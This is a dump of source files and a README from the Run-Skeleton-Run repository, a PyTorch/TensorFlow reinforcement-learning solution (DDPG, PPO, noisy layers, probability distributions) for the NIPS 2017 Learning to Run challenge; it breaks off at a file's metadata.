action_handler = create_action_handler(args)\n observation = client.env_create(args.token)\n action = np.zeros(ACTION_SHAPE, dtype=np.float32)\n observation = observation_handler(observation, action)\n\n submitted = False\n while not submitted:\n print(episode_metrics[\"reward\"])\n action = act_fn(observation)\n\n observation, reward, done, _ = client.env_step(action_handler(action).tolist())\n\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n if done:\n all_episode_metrics.append(episode_metrics)\n\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n }\n\n observation_handler = create_observation_handler(args)\n action_handler = create_action_handler(args)\n observation = client.env_create(args.token)\n\n if not observation:\n submitted = True\n break\n\n action = np.zeros(ACTION_SHAPE, dtype=np.float32)\n observation = observation_handler(observation, action)\n else:\n observation = observation_handler(observation, action)\n\n df = pd.DataFrame(all_episode_metrics)\n pprint(df.describe())\n\n if query_yes_no(\"Submit?\"):\n client.submit()\n\n\ndef test(actor, critic, args, act_update_fn):\n act_fn, _, _ = act_update_fn(actor, critic, None, None, args)\n env = RunEnv(visualize=args.visualize, max_obstacles=args.max_obstacles)\n\n all_episode_metrics = []\n for episode in range(args.num_episodes):\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n }\n\n observation_handler = create_observation_handler(args)\n action_handler = create_action_handler(args)\n observation = env.reset(difficulty=2, seed=SEEDS[episode % len(SEEDS)])\n action = np.zeros(ACTION_SHAPE, dtype=np.float32)\n observation = observation_handler(observation, action)\n\n done = False\n while not done:\n print(episode_metrics[\"reward\"])\n action = act_fn(observation)\n\n observation, reward, done, _ = env.step(action_handler(action))\n\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n if done:\n break\n\n observation = observation_handler(observation, action)\n\n all_episode_metrics.append(episode_metrics)\n\n df = pd.DataFrame(all_episode_metrics)\n pprint(df.describe())\n\n\ndef submit_or_test(args, model_fn, act_update_fn, submit_fn, test_fn):\n args = restore_args(args)\n env = create_env(args)\n\n args.n_action = env.action_space.shape[0]\n args.n_observation = env.observation_space.shape[0]\n\n args.actor_layers = str2params(args.actor_layers)\n args.critic_layers = str2params(args.critic_layers)\n\n args.actor_activation = activations[args.actor_activation]\n args.critic_activation = activations[args.critic_activation]\n\n actor, critic = model_fn(args)\n actor.load_state_dict(torch.load(args.restore_actor_from))\n critic.load_state_dict(torch.load(args.restore_critic_from))\n\n if args.submit:\n submit_fn(actor, critic, args, act_update_fn)\n else:\n test_fn(actor, critic, args, act_update_fn)\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n torch.set_num_threads(1)\n args = parse_args()\n submit_or_test(args, create_model, create_act_update_fns, submit, test)\n"
},
{
"alpha_fraction": 0.5934696197509766,
"alphanum_fraction": 0.6001994013786316,
"avg_line_length": 42.60869598388672,
"blob_id": "4c199d54f5f754b2c851730b92cf50a2995a1314",
"content_id": "c9e33a640a474b7e56ab7e8e378e8408121aae29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4012,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 92,
"path": "/common/modules/NoisyLinear.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import math\n\nimport torch\nfrom torch.nn.parameter import Parameter\nimport torch.nn.functional as F\nfrom torch.nn.modules.module import Module\nfrom torch.autograd import Variable\n\n\nclass NoisyLinear(Module):\n \"\"\"Applies a noisy linear transformation to the incoming data:\n :math:`y = (mu_w + sigma_w \\cdot epsilon_w)x + mu_b + sigma_b \\cdot epsilon_b`\n More details can be found in the paper `Noisy Networks for Exploration` _ .\n Args:\n in_features: size of each input sample\n out_features: size of each output sample\n bias: If set to False, the layer will not learn an additive bias. Default: True\n factorised: whether or not to use factorised noise. Default: True\n std_init: initialization constant for standard deviation component of weights. If None,\n defaults to 0.017 for independent and 0.4 for factorised. Default: None\n Shape:\n - Input: :math:`(N, in\\_features)`\n - Output: :math:`(N, out\\_features)`\n Attributes:\n weight: the learnable weights of the module of shape (out_features x in_features)\n bias: the learnable bias of the module of shape (out_features)\n Examples::\n >>> m = nn.NoisyLinear(20, 30)\n >>> input = autograd.Variable(torch.randn(128, 20))\n >>> output = m(input)\n >>> print(output.size())\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True, factorised=True, std_init=None):\n super(NoisyLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.factorised = factorised\n self.weight_mu = Parameter(torch.Tensor(out_features, in_features))\n self.weight_sigma = Parameter(torch.Tensor(out_features, in_features))\n if bias:\n self.bias_mu = Parameter(torch.Tensor(out_features))\n self.bias_sigma = Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n if not std_init:\n if self.factorised:\n self.std_init = 0.4\n else:\n self.std_init = 0.017\n else:\n self.std_init = std_init\n self.reset_parameters(bias)\n\n def reset_parameters(self, bias):\n if self.factorised:\n mu_range = 1. / math.sqrt(self.weight_mu.size(1))\n self.weight_mu.data.uniform_(-mu_range, mu_range)\n self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.weight_sigma.size(1)))\n if bias:\n self.bias_mu.data.uniform_(-mu_range, mu_range)\n self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.bias_sigma.size(0)))\n else:\n mu_range = math.sqrt(3. / self.weight_mu.size(1))\n self.weight_mu.data.uniform_(-mu_range, mu_range)\n self.weight_sigma.data.fill_(self.std_init)\n if bias:\n self.bias_mu.data.uniform_(-mu_range, mu_range)\n self.bias_sigma.data.fill_(self.std_init)\n\n def scale_noise(self, size):\n x = torch.Tensor(size).normal_()\n x = x.sign().mul(x.abs().sqrt())\n return x\n\n def forward(self, input):\n if self.factorised:\n epsilon_in = self.scale_noise(self.in_features)\n epsilon_out = self.scale_noise(self.out_features)\n weight_epsilon = Variable(epsilon_out.ger(epsilon_in))\n bias_epsilon = Variable(self.scale_noise(self.out_features))\n else:\n weight_epsilon = Variable(torch.Tensor(self.out_features, self.in_features).normal_())\n bias_epsilon = Variable(torch.Tensor(self.out_features).normal_())\n return F.linear(input,\n self.weight_mu + self.weight_sigma.mul(weight_epsilon),\n self.bias_mu + self.bias_sigma.mul(bias_epsilon))\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n"
},
{
"alpha_fraction": 0.6398399472236633,
"alphanum_fraction": 0.6731880903244019,
"avg_line_length": 24.269662857055664,
"blob_id": "610bfbcb8029868c14fc8f164e70e634ffca082f",
"content_id": "9829210bbc7f155cabcf8d07f61aadfe64f347d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2249,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 89,
"path": "/README.md",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "# Run-Skeleton-Run\n\n[Reason8.ai](https://reason8.ai) PyTorch solution for 3rd place [NIPS RL 2017 challenge](https://www.crowdai.org/challenges/nips-2017-learning-to-run/leaderboards?challenge_round_id=12).\n\n[Theano version](https://github.com/fgvbrt/nips_rl)\n\nAdditional thanks to [Mikhail Pavlov](https://github.com/fgvbrt) for collaboration.\n\n## Agent policies\n\n### no-flip-state-action\n\n\n\n### flip-state-action\n\n\n\n\n## How to setup environment?\n\n1. `sh setup_conda.sh`\n2. `source activate opensim-rl`\n\nWould like to test baselines? (Need MPI support)\n\n3. `sudo apt-get install openmpi-bin openmpi-doc libopenmpi-dev`\n3+. `sh setup_env_mpi.sh`\n\nOR like DDPG agents?\n3. `sh setup_env.sh`\n\n4. Congrats! Now you are ready to check our agents.\n\n\n## Run DDPG agent\n\n```\nCUDA_VISIBLE_DEVICES=\"\" PYTHONPATH=. python ddpg/train.py \\\n --logdir ./logs_ddpg \\\n --num-threads 4 \\\n --ddpg-wrapper \\\n --skip-frames 5 \\\n --fail-reward -0.2 \\\n --reward-scale 10 \\\n --flip-state-action \\\n --actor-layers 64-64 --actor-layer-norm --actor-parameters-noise \\\n --actor-lr 0.001 --actor-lr-end 0.00001 \\\n --critic-layers 64-32 --critic-layer-norm \\\n --critic-lr 0.002 --critic-lr-end 0.00001 \\\n --initial-epsilon 0.5 --final-epsilon 0.001 \\\n --tau 0.0001\n```\n\n\n## Evaluate DDPG agent\n\n```\nCUDA_VISIBLE_DEVICES=\"\" PYTHONPATH=./ python ddpg/submit.py \\\n --restore-actor-from ./logs_ddpg/actor_state_dict.pkl \\\n --restore-critic-from ./logs_ddpg/critic_state_dict.pkl \\\n --restore-args-from ./logs_ddpg/args.json \\\n --num-episodes 10\n\n```\n\n\n## Run TRPO/PPO agent\n\n```\nCUDA_VISIBLE_DEVICES=\"\" PYTHONPATH=. python ddpg/train.py \\\n --agent ppo \\\n --logdir ./logs_baseline \\\n --baseline-wrapper \\\n --skip-frames 5 \\\n --fail-reward -0.2 \\\n --reward-scale 10\n```\n\n## Citation\nPlease cite the following paper if you feel this repository useful.\n```\n@article{run_skeleton,\n title={Run, skeleton, run: skeletal model in a physics-based simulation},\n author = {Mikhail Pavlov, Sergey Kolesnikov and Sergey M.~Plis},\n journal={AAAI Spring Symposium Series},\n year={2018}\n}\n```\n"
},
{
"alpha_fraction": 0.5974599123001099,
"alphanum_fraction": 0.6049465537071228,
"avg_line_length": 42.74269104003906,
"blob_id": "c200ef345929c6afbcc06f371e58619fd3cfee92",
"content_id": "2823db4c519562b5ca555801d1b7b53f060105be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7480,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 171,
"path": "/baselines/ppo.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport time\nfrom mpi4py import MPI\nfrom collections import deque\nfrom contextlib import contextmanager\n\nfrom common.logger import Logger\nfrom baselines.baselines_common import Dataset, explained_variance, fmt_row, zipsame\nimport baselines.baselines_common.tf_util as U\nfrom baselines.baselines_common.mpi_adam import MpiAdam\nfrom baselines.baselines_common.mpi_saver import MpiSaver\nfrom baselines.baselines_common.mpi_moments import mpi_moments\n\nfrom baselines.trajectories import traj_segment_generator, add_vtarg_and_adv\n\n\ndef learn(env, policy_func, args, *,\n timesteps_per_batch, # timesteps per actor per update\n clip_param, entcoeff, # clipping parameter epsilon, entropy coeff\n optim_epochs, optim_stepsize, optim_batchsize, # optimization hypers\n gamma, lam, # advantage estimation\n adam_epsilon=1e-5,\n schedule='constant'): # annealing for stepsize parameters (epsilon and adam),\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space) # Construct network for new policy\n oldpi = policy_func(\"oldpi\", ob_space, ac_space) # Network for old policy\n atarg = tf.placeholder(dtype=tf.float32,\n shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32,\n shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n pol_entpen = (-entcoeff) * meanent\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold\n surr1 = ratio * atarg # surrogate from conservative policy iteration\n surr2 = U.clip(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg #\n pol_surr = - U.mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP)\n vf_loss = U.mean(tf.square(pi.vpred - ret))\n total_loss = pol_surr + pol_entpen + vf_loss\n losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n\n var_list = pi.get_trainable_variables()\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult],\n losses + [U.flatgrad(total_loss, var_list)])\n adam = MpiAdam(var_list, epsilon=adam_epsilon)\n policy_var_list = [v for v in var_list if v.name.split(\"/\")[0].startswith(\"pi\")]\n saver = MpiSaver(policy_var_list, log_prefix=args.logdir)\n\n assign_old_eq_new = U.function([], [], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in\n zipsame(oldpi.get_variables(),\n pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses)\n\n U.initialize()\n saver.restore(restore_from=args.restore_actor_from)\n adam.sync()\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, args, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards\n\n # max_timesteps = 1e10\n cur_lrmult = 1.0\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n logger = Logger(args.logdir)\n\n while time.time() - tstart < 86400 * args.max_train_days:\n # if schedule == 'constant':\n # cur_lrmult = 1.0\n # elif schedule == 'linear':\n # cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n # else:\n # raise NotImplementedError\n\n # logger.log(\"********** Iteration %i ************\" % iters_so_far)\n\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam)\n\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=True)\n optim_batchsize = optim_batchsize or ob.shape[0]\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n assign_old_eq_new() # set old parameter values to new parameter values\n # logger.log(\"Optimizing...\")\n # logger.log(fmt_row(13, loss_names))\n # Here we do a bunch of optimization epochs over the data\n for _ in range(optim_epochs):\n losses = [] # list of tuples, each of which gives the loss for a minibatch\n for batch in d.iterate_once(optim_batchsize):\n *newlosses, g = lossandgrad(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"],\n batch[\"vtarg\"], cur_lrmult)\n adam.update(g, optim_stepsize * cur_lrmult)\n losses.append(newlosses)\n # logger.log(fmt_row(13, np.mean(losses, axis=0)))\n\n saver.sync()\n # logger.log(\"Evaluating losses...\")\n losses = []\n for batch in d.iterate_once(optim_batchsize):\n newlosses = compute_losses(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"],\n cur_lrmult)\n losses.append(newlosses)\n meanlosses, _, _ = mpi_moments(losses, axis=0)\n # logger.log(fmt_row(13, meanlosses))\n\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far += 1\n\n # Logging\n logger.scalar_summary(\"episodes\", len(lens), iters_so_far)\n\n for (lossname, lossval) in zip(loss_names, meanlosses):\n logger.scalar_summary(lossname, lossval, episodes_so_far)\n\n logger.scalar_summary(\"ev_tdlam_before\", explained_variance(vpredbefore, tdlamret), episodes_so_far)\n\n logger.scalar_summary(\"step\", np.mean(lenbuffer), episodes_so_far)\n logger.scalar_summary(\"reward\", np.mean(rewbuffer), episodes_so_far)\n logger.scalar_summary(\"best reward\", np.max(rewbuffer), episodes_so_far)\n\n elapsed_time = time.time() - tstart\n\n logger.scalar_summary(\n \"episode per minute\",\n episodes_so_far / elapsed_time * 60,\n episodes_so_far)\n logger.scalar_summary(\n \"step per second\",\n timesteps_so_far / elapsed_time,\n episodes_so_far)\n\n\ndef flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n"
},
{
"alpha_fraction": 0.6709359884262085,
"alphanum_fraction": 0.6729063987731934,
"avg_line_length": 26.432432174682617,
"blob_id": "7e5c15814bf3a5a21c00a8856cacc003251299fb",
"content_id": "88f64dd16e45199f8673ba2d64f5689dba689fe5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1015,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 37,
"path": "/common/torch_util.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.autograd import Variable\n\nUSE_CUDA = torch.cuda.is_available()\nFLOAT = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\n\n\ndef to_numpy(var):\n return var.cpu().data.numpy() if USE_CUDA else var.data.numpy()\n\n\ndef to_tensor(ndarray, volatile=False, requires_grad=False, dtype=FLOAT):\n return Variable(\n torch.from_numpy(ndarray), volatile=volatile, requires_grad=requires_grad\n ).type(dtype)\n\n\ndef soft_update(target, source, tau):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(\n target_param.data * (1.0 - tau) + param.data * tau\n )\n\n\ndef hard_update(target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)\n\n\nactivations = {\n \"relu\": torch.nn.ReLU,\n \"elu\": torch.nn.ELU,\n \"leakyrelu\": torch.nn.LeakyReLU,\n \"selu\": torch.nn.SELU,\n \"sigmoid\": torch.nn.Sigmoid,\n \"tanh\": torch.nn.Tanh\n}\n"
},
{
"alpha_fraction": 0.5914661288261414,
"alphanum_fraction": 0.6061006784439087,
"avg_line_length": 29.087533950805664,
"blob_id": "d7460e47caf321fda26e0269d74fd1d0d04c2d89",
"content_id": "1d42559a94c5dc064b6a17a19eaf7ca6756f66fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11343,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 377,
"path": "/baselines/baselines_common/distributions.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport baselines.baselines_common.tf_util as U\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn\n\n\nclass Pd(object):\n \"\"\"\n A particular probability distribution\n \"\"\"\n\n def flatparam(self):\n raise NotImplementedError\n\n def mode(self):\n raise NotImplementedError\n\n def neglogp(self, x):\n # Usually it's easier to define the negative logprob\n raise NotImplementedError\n\n def kl(self, other):\n raise NotImplementedError\n\n def entropy(self):\n raise NotImplementedError\n\n def sample(self):\n raise NotImplementedError\n\n def logp(self, x):\n return - self.neglogp(x)\n\n\nclass PdType(object):\n \"\"\"\n Parametrized family of probability distributions\n \"\"\"\n\n def pdclass(self):\n raise NotImplementedError\n\n def pdfromflat(self, flat):\n return self.pdclass()(flat)\n\n def param_shape(self):\n raise NotImplementedError\n\n def sample_shape(self):\n raise NotImplementedError\n\n def sample_dtype(self):\n raise NotImplementedError\n\n def param_placeholder(self, prepend_shape, name=None):\n return tf.placeholder(dtype=tf.float32, shape=prepend_shape + self.param_shape(), name=name)\n\n def sample_placeholder(self, prepend_shape, name=None):\n return tf.placeholder(dtype=self.sample_dtype(), shape=prepend_shape + self.sample_shape(),\n name=name)\n\n\nclass CategoricalPdType(PdType):\n def __init__(self, ncat):\n self.ncat = ncat\n\n def pdclass(self):\n return CategoricalPd\n\n def param_shape(self):\n return [self.ncat]\n\n def sample_shape(self):\n return []\n\n def sample_dtype(self):\n return tf.int32\n\n\nclass MultiCategoricalPdType(PdType):\n def __init__(self, low, high):\n self.low = low\n self.high = high\n self.ncats = high - low + 1\n\n def pdclass(self):\n return MultiCategoricalPd\n\n def pdfromflat(self, flat):\n return MultiCategoricalPd(self.low, self.high, flat)\n\n def param_shape(self):\n return [sum(self.ncats)]\n\n def sample_shape(self):\n return [len(self.ncats)]\n\n def sample_dtype(self):\n return tf.int32\n\n\nclass DiagGaussianPdType(PdType):\n def __init__(self, size):\n self.size = size\n\n def pdclass(self):\n return DiagGaussianPd\n\n def param_shape(self):\n return [2 * self.size]\n\n def sample_shape(self):\n return [self.size]\n\n def sample_dtype(self):\n return tf.float32\n\n\nclass BernoulliPdType(PdType):\n def __init__(self, size):\n self.size = size\n\n def pdclass(self):\n return BernoulliPd\n\n def param_shape(self):\n return [self.size]\n\n def sample_shape(self):\n return [self.size]\n\n def sample_dtype(self):\n return tf.int32\n\n\n# WRONG SECOND DERIVATIVES\n# class CategoricalPd(Pd):\n# def __init__(self, logits):\n# self.logits = logits\n# self.ps = tf.nn.softmax(logits)\n# @classmethod\n# def fromflat(cls, flat):\n# return cls(flat)\n# def flatparam(self):\n# return self.logits\n# def mode(self):\n# return U.argmax(self.logits, axis=-1)\n# def logp(self, x):\n# return -tf.nn.sparse_softmax_cross_entropy_with_logits(self.logits, x)\n# def kl(self, other):\n# return tf.nn.softmax_cross_entropy_with_logits(other.logits, self.ps) \\\n# - tf.nn.softmax_cross_entropy_with_logits(self.logits, self.ps)\n# def entropy(self):\n# return tf.nn.softmax_cross_entropy_with_logits(self.logits, self.ps)\n# def sample(self):\n# u = tf.random_uniform(tf.shape(self.logits))\n# return U.argmax(self.logits - tf.log(-tf.log(u)), axis=-1)\n\nclass CategoricalPd(Pd):\n def __init__(self, logits):\n self.logits = logits\n\n def flatparam(self):\n return self.logits\n\n def mode(self):\n return U.argmax(self.logits, axis=-1)\n\n def neglogp(self, x):\n # return tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits, labels=x)\n # Note: we can't use sparse_softmax_cross_entropy_with_logits because\n # the implementation does not allow second-order derivatives...\n one_hot_actions = tf.one_hot(x, self.logits.get_shape().as_list()[-1])\n return tf.nn.softmax_cross_entropy_with_logits(\n logits=self.logits,\n labels=one_hot_actions)\n\n def kl(self, other):\n a0 = self.logits - U.max(self.logits, axis=-1, keepdims=True)\n a1 = other.logits - U.max(other.logits, axis=-1, keepdims=True)\n ea0 = tf.exp(a0)\n ea1 = tf.exp(a1)\n z0 = U.sum(ea0, axis=-1, keepdims=True)\n z1 = U.sum(ea1, axis=-1, keepdims=True)\n p0 = ea0 / z0\n return U.sum(p0 * (a0 - tf.log(z0) - a1 + tf.log(z1)), axis=-1)\n\n def entropy(self):\n a0 = self.logits - U.max(self.logits, axis=-1, keepdims=True)\n ea0 = tf.exp(a0)\n z0 = U.sum(ea0, axis=-1, keepdims=True)\n p0 = ea0 / z0\n return U.sum(p0 * (tf.log(z0) - a0), axis=-1)\n\n def sample(self):\n u = tf.random_uniform(tf.shape(self.logits))\n return tf.argmax(self.logits - tf.log(-tf.log(u)), axis=-1)\n\n @classmethod\n def fromflat(cls, flat):\n return cls(flat)\n\n\nclass MultiCategoricalPd(Pd):\n def __init__(self, low, high, flat):\n self.flat = flat\n self.low = tf.constant(low, dtype=tf.int32)\n self.categoricals = list(\n map(CategoricalPd, tf.split(flat, high - low + 1, axis=len(flat.get_shape()) - 1)))\n\n def flatparam(self):\n return self.flat\n\n def mode(self):\n return self.low + tf.cast(tf.stack([p.mode() for p in self.categoricals], axis=-1),\n tf.int32)\n\n def neglogp(self, x):\n return tf.add_n([p.neglogp(px) for p, px in zip(\n self.categoricals, tf.unstack(x - self.low,\n axis=len(x.get_shape()) - 1))])\n\n def kl(self, other):\n return tf.add_n([\n p.kl(q) for p, q in zip(self.categoricals, other.categoricals)\n ])\n\n def entropy(self):\n return tf.add_n([p.entropy() for p in self.categoricals])\n\n def sample(self):\n return self.low + tf.cast(tf.stack([p.sample() for p in self.categoricals], axis=-1),\n tf.int32)\n\n @classmethod\n def fromflat(cls, flat):\n raise NotImplementedError\n\n\nclass DiagGaussianPd(Pd):\n def __init__(self, flat):\n self.flat = flat\n mean, logstd = tf.split(axis=len(flat.shape) - 1, num_or_size_splits=2, value=flat)\n self.mean = mean\n self.logstd = logstd\n self.std = tf.exp(logstd)\n\n def flatparam(self):\n return self.flat\n\n def mode(self):\n return self.mean\n\n def neglogp(self, x):\n return 0.5 * U.sum(tf.square((x - self.mean) / self.std), axis=-1) \\\n + 0.5 * np.log(2.0 * np.pi) * tf.to_float(tf.shape(x)[-1]) \\\n + U.sum(self.logstd, axis=-1)\n\n def kl(self, other):\n assert isinstance(other, DiagGaussianPd)\n return U.sum(other.logstd - self.logstd + (\n tf.square(self.std) + tf.square(self.mean - other.mean)) / (\n 2.0 * tf.square(other.std)) - 0.5, axis=-1)\n\n def entropy(self):\n return U.sum(self.logstd + .5 * np.log(2.0 * np.pi * np.e), axis=-1)\n\n def sample(self):\n return self.mean + self.std * tf.random_normal(tf.shape(self.mean))\n\n @classmethod\n def fromflat(cls, flat):\n return cls(flat)\n\n\nclass BernoulliPd(Pd):\n def __init__(self, logits):\n self.logits = logits\n self.ps = tf.sigmoid(logits)\n\n def flatparam(self):\n return self.logits\n\n def mode(self):\n return tf.round(self.ps)\n\n def neglogp(self, x):\n return U.sum(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.logits, labels=tf.to_float(x)),\n axis=-1)\n\n def kl(self, other):\n return U.sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=other.logits, labels=self.ps),\n axis=-1) - U.sum(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.logits, labels=self.ps), axis=-1)\n\n def entropy(self):\n return U.sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.logits, labels=self.ps),\n axis=-1)\n\n def sample(self):\n u = tf.random_uniform(tf.shape(self.ps))\n return tf.to_float(math_ops.less(u, self.ps))\n\n @classmethod\n def fromflat(cls, flat):\n return cls(flat)\n\n\ndef make_pdtype(ac_space):\n from gym import spaces\n if isinstance(ac_space, spaces.Box):\n assert len(ac_space.shape) == 1\n return DiagGaussianPdType(ac_space.shape[0])\n elif isinstance(ac_space, spaces.Discrete):\n return CategoricalPdType(ac_space.n)\n elif isinstance(ac_space, spaces.MultiDiscrete):\n return MultiCategoricalPdType(ac_space.low, ac_space.high)\n elif isinstance(ac_space, spaces.MultiBinary):\n return BernoulliPdType(ac_space.n)\n else:\n raise NotImplementedError\n\n\ndef shape_el(v, i):\n maybe = v.get_shape()[i]\n if maybe is not None:\n return maybe\n else:\n return tf.shape(v)[i]\n\n\[email protected]_session\ndef test_probtypes():\n np.random.seed(0)\n\n pdparam_diag_gauss = np.array([-.2, .3, .4, -.5, .1, -.5, .1, 0.8])\n diag_gauss = DiagGaussianPdType(pdparam_diag_gauss.size // 2) # pylint: disable=E1101\n validate_probtype(diag_gauss, pdparam_diag_gauss)\n\n pdparam_categorical = np.array([-.2, .3, .5])\n categorical = CategoricalPdType(pdparam_categorical.size) # pylint: disable=E1101\n validate_probtype(categorical, pdparam_categorical)\n\n pdparam_bernoulli = np.array([-.2, .3, .5])\n bernoulli = BernoulliPdType(pdparam_bernoulli.size) # pylint: disable=E1101\n validate_probtype(bernoulli, pdparam_bernoulli)\n\n\ndef validate_probtype(probtype, pdparam):\n N = 100000\n # Check to see if mean negative log likelihood == differential entropy\n Mval = np.repeat(pdparam[None, :], N, axis=0)\n M = probtype.param_placeholder([N])\n X = probtype.sample_placeholder([N])\n pd = probtype.pdclass()(M)\n calcloglik = U.function([X, M], pd.logp(X))\n calcent = U.function([M], pd.entropy())\n Xval = U.eval(pd.sample(), feed_dict={M: Mval})\n logliks = calcloglik(Xval, Mval)\n entval_ll = - logliks.mean() # pylint: disable=E1101\n entval_ll_stderr = logliks.std() / np.sqrt(N) # pylint: disable=E1101\n entval = calcent(Mval).mean() # pylint: disable=E1101\n assert np.abs(entval - entval_ll) < 3 * entval_ll_stderr # within 3 sigmas\n\n # Check to see if kldiv[p,q] = - ent[p] - E_p[log q]\n M2 = probtype.param_placeholder([N])\n pd2 = probtype.pdclass()(M2)\n q = pdparam + np.random.randn(pdparam.size) * 0.1\n Mval2 = np.repeat(q[None, :], N, axis=0)\n calckl = U.function([M, M2], pd.kl(pd2))\n klval = calckl(Mval, Mval2).mean() # pylint: disable=E1101\n logliks = calcloglik(Xval, Mval2)\n klval_ll = - entval - logliks.mean() # pylint: disable=E1101\n klval_ll_stderr = logliks.std() / np.sqrt(N) # pylint: disable=E1101\n assert np.abs(klval - klval_ll) < 3 * klval_ll_stderr # within 3 sigmas\n"
},
{
"alpha_fraction": 0.516417920589447,
"alphanum_fraction": 0.5223880410194397,
"avg_line_length": 26.91666603088379,
"blob_id": "c1d30a0d340e73a1482dc96a87a657cfd3f338e3",
"content_id": "c92bc16ba7b3c95a0c6324c96c24c7157bc9df56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 24,
"path": "/baselines/baselines_common/mpi_fork.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
